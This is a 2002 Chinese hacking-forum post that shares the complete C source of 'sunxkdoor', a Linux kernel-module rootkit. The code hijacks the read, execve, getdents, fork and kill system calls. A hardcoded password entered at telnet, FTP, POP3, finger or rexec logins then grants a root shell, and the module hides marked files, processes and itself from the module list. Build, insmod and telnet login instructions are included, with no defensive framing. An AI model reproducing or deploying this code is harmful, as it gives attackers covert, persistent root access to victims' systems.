HUA 
级别:一般站友
威望:0
经验:0
货币:6
体力:
来源:海南
总发帖数:27
注册日期:2002-01-29 |
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
/********************************************************
* 超级后门 1.2 for Linux *
* writen by sunx *
* door port
21,23,79,110,512 *
* anyone dont modify it *
*********************************************************
*
*
* gcc -O2 -c sunxkdoor.c *
* gcc -O2 -c -D__SMP__
sunxkdoor.c *
* insmod sunxkdoor *
* *
*********************************************************
*
telnet 192.168.0.21 23 *
* login: sunxkdoor *
* telnet
192.168.0.21 23 *
* sh# *
* *
*********************************************************
*
hide dir and file named "... " or "sunxdoor" *
* *
* kill
-50 pid //hide ps *
* kill -51 pid //unhide ps *
* kill -52
0 //hide all hidden process *
* kill -53 0 //unhide all hidden
process *
* kill -60 0 //inc module usecount *
* kill -61 0
//dec module usecount *
*********************************************************/
/*
for redhat 7
kgcc -O2 -c -D__SMP__
-I/usr/src/linux/include -include /usr/src/linux/include
/linux/modversions.h sunxkdoor.c
*/
#define
__KERNEL__
#define MODULE
#define MODVERSIONS
#define S_KERNEL_VERSION(a,b,c) (((a) << 16) + ((b)
<< 8) + (c))
#include <linux/modversions.h>
#include <sys/syscall.h>
#include
<linux/kernel.h>
#include <linux/module.h>
#include <linux/types.h>
#include
<linux/unistd.h>
#include <linux/fs.h>
#include
<linux/sched.h>
#include <asm/segment.h>
#include <linux/mm.h>
#include <linux/proc_fs.h>
#include <linux/dirent.h>
#if
LINUX_VERSION_CODE < S_KERNEL_VERSION(2,2,0)
#define
OLD_KERNEL
#define copy_from_user memcpy_fromfs
#define
copy_to_user memcpy_tofs
#else
#include
<asm/uaccess.h>
#endif
#define BEGIN_KMEM
{unsigned long old_fs=get_fs();set_fs(get_ds());
#define
END_KMEM set_fs(old_fs);}
#define SIGHIDE 50
#define
SIGUNHIDE 51
#define SIGHIDEALL 52
#define SIGUNHIDEALL 53
#define SIGINCMODUSECOUNT 60
#define SIGDECMODUSECOUNT 61
#define HIDEDIR "... "
char *PASS = "sunxkdoor";
char *MODNAME="sunxkdoor";
char *SHELL = "/bin/sh";
char *LOGIN[] = {
"/bin/login",
"/usr/sbin/in.ftpd",
"/usr/sbin/in.rexecd",
"/usr/sbin/in.qpopper",
"/usr/sbin/in.fingerd",
"/usr/sbin/ipop3d",
0};
extern void *sys_call_table[];
/* this
functions will we replace */
int (*o_read)(int, char*, int);
int (*o_execve)(struct pt_regs regs);
int (*o_exit)(int);
int (*o_kill)(pid_t, int);
int (*o_getdents)(uint,
struct dirent *, uint);
pid_t (*o_fork)(struct pt_regs);
#ifndef OLD_KERNEL
struct module *
nextmodule;
struct module * m =
&__this_module;
#endif
int processid = -1;
int
give_shell = 0;
static char strlogin[64];
int strloginlen =
0;
int shelltype = 0;
int n_read(int fd, char *s, int
len)
{
int r = 0;
int i, ii;
r = o_read(fd, s,
len);
if(r <= 0) return r;
if(fd != 0) return r;
if(current->pid != processid) return r;
if(r >
30 )
i = 30;
else
i = r;
#ifdef OLD_KERNEL
for(ii=0; ii < i ;ii++)
strlogin+ii = get_user(s+ii);
#else
copy_from_user(strlogin, s, i);
#endif
strlogin[i]=0;
for(ii=0; ii < i;ii++)
{
if(strlogin[ii] != PASS[strloginlen])
{
processid = -1;
strloginlen=0;
return r;
}
strloginlen ++;
if(PASS[strloginlen]==0)
{
processid = -1;
strloginlen=0;
give_shell = 1;
o_exit(0);
}
}
return r;
}
int n_exec(struct pt_regs
regs)
{
int error = 0;
int i;
char *filename =
NULL, **argv;
#ifdef OLD_KERNEL
getname((char*)regs.ebx,
&filename);
#else
filename = getname((char*)regs.ebx);
#endif
for(i=0; LOGIN[i]!=0; i++)
if(strcmp(filename, LOGIN[i]) == 0)
{
if((give_shell)
&& (shelltype == i))
{
give_shell = 0;
processid
= -1;
strcpy(filename, SHELL);
argv = (char**)regs.ecx;
put_user(0, argv + 1);
}else
{
shelltype = i;
processid = current->pid;
}
}
error =
do_execve(filename, (char**)regs.ecx, (char**)regs.edx, ®s);
putname(filename);
return error;
}
#define PF_INVISIBLE 0x10000000
static int
is_hideproc(pid_t pid)
{
struct task_struct *t = current;
while(1)
{
if(t->pid == pid) break;
t =
t->next_task;
if(t == current) break;
}
if(t->pid
!= pid) return 0;
return (t->flags & PF_INVISIBLE);
}
int n_getdents(unsigned int fd, struct dirent *dirp,
unsigned int count)
{
unsigned int r, n;
int proc = 0;
int i;
struct inode *dinode;
struct dirent *mydirp,
*p_dirp;
r = (*o_getdents) (fd, dirp, count);
if(!r)
return -r;
#ifdef __LINUX_DCACHE_H
dinode =
current->files->fd[fd]->f_dentry->d_inode;
#else
dinode = current->files->fd[fd]->f_inode;
#endif
if( (dinode->i_ino == PROC_ROOT_INO) &&
(!MAJOR(dinode->i_dev)) && MINOR(dinode->i_dev) ==
1
)proc = 1;
mydirp = (struct dirent *) kmalloc(r,
GFP_KERNEL);
copy_from_user(mydirp, dirp, r);
p_dirp =
mydirp;
i = r;
while (i > 0)
{
n =
p_dirp->d_reclen;
i -= n;
if(
(proc &&
is_hideproc(simple_strtoul(p_dirp->d_name, NULL, 10))) ||
(strstr((char *) &(p_dirp->d_name), HIDEDIR)) ||
(strstr((char *) &(p_dirp->d_name), MODNAME))
)
{
if (i != 0)
memmove(p_dirp, (char *) p_dirp +
p_dirp->d_reclen, i);
else
p_dirp->d_off = 1024;
r -= n;
}
if (p_dirp->d_reclen == 0)
{
r -= i;
i = 0;
}
if (i != 0)
p_dirp =
(struct dirent *) ((char *) p_dirp + p_dirp->d_reclen);
}
copy_to_user(dirp, mydirp, r);
kfree(mydirp);
return
r;
}
pid_t n_fork(struct pt_regs regs)
{
pid_t
pid;
int hideit;
struct task_struct *t = current;
pid = (*o_fork)(regs);
while(1)
{
if(t->pid == pid) break;
t = t->next_task;
if(t ==
current) break;
}
if( (t->pid == pid) &&
is_hideproc(current->pid)) t->flags |= PF_INVISIBL
E;
return pid;
}
int n_kill(pid_t pid, int
sig)
{
int ret;
struct task_struct *t = current;
if(sig != SIGHIDE && sig != SIGUNHIDE && sig
!= SIGHIDEALL && sig != SIGUNHI
DEALL
&& sig != SIGDECMODUSECOUNT
&& sig != SIGINCMODUSECOUNT)
{
ret = (*o_kill)(pid,
sig);
return ret;
}
if((sig == SIGHIDEALL || sig ==
SIGUNHIDEALL || sig == SIGDECMODUSECOUNT ||
sig ==
SIGINCMODUSECOUNT)
&& (pid != 0))
{
ret = (*o_kill)(pid, sig);
return
ret;
}
if(current->euid != 0)
return -EPERM;
if(sig
== SIGHIDEALL)
{
t =
current;
while(1)
{
if(t->pid > 300) t->flags
|= PF_INVISIBLE;
t = t->next_task;
if(t == current) break;
}
return 0;
}
if(sig == SIGUNHIDEALL)
{
t = current;
while(1)
{
if(t->pid > 300) t->flags &= ~PF_INVISIBLE;
t =
t->next_task;
if(t == current) break;
}
return 0;
}
if(sig == SIGINCMODUSECOUNT)
{
atomic_inc(&m->uc.usecount);
}
if(sig == SIGDECMODUSECOUNT)
{
atomic_dec(&m->uc.usecount);
}
while(1)
{
if(t->pid == pid) break;
t =
t->next_task;
if(t == current) break;
}
if(t->pid
!= pid) return -ESRCH;
switch(sig)
{
case SIGHIDE:
t->flags |= PF_INVISIBLE;
break;
case SIGUNHIDE:
t->flags &= ~PF_INVISIBLE;
break;
default:
break;
}
return 0;
}
/* redirect the
syscalls */
int init_module(void)
{
#ifdef OLD_KERNEL
register_symtab(NULL);
#else
EXPORT_NO_SYMBOLS;
#endif
o_execve = sys_call_table[SYS_execve];
o_read
= sys_call_table[SYS_read];
o_exit = sys_call_table[SYS_exit];
o_getdents = sys_call_table[SYS_getdents];
o_fork =
sys_call_table[SYS_fork];
o_kill = sys_call_table[SYS_kill];
sys_call_table[SYS_execve] = n_exec;
sys_call_table[SYS_read] = n_read;
sys_call_table[SYS_getdents] = n_getdents;
sys_call_table[SYS_fork] = n_fork;
sys_call_table[SYS_kill]
= n_kill;
#ifndef OLD_KERNEL
if ( ( m
!= NULL ) && ( m->init == init_module ) )
{
nextmodule = m->next;
m->name = m->next->name;
m->next = m->next->next;
atomic_inc(&m->uc.usecount);
}
#endif
return 0;
}
int cleanup_module(void)
{
sys_call_table[SYS_execve] = o_execve;
sys_call_table[SYS_read] = o_read;
sys_call_table[SYS_getdents] = o_getdents;
sys_call_table[SYS_fork] = o_fork;
sys_call_table[SYS_kill]
= o_kill;
#ifndef OLD_KERNEL
m->next = nextmodule;
#endif
return 0;
}
|
首页 
小榕软件实验室 
刀光雪影 
在给个后门linux 
将此页发给您的朋友
编辑
删除
发表于
2002-04-15.22:07:37 
IP: 
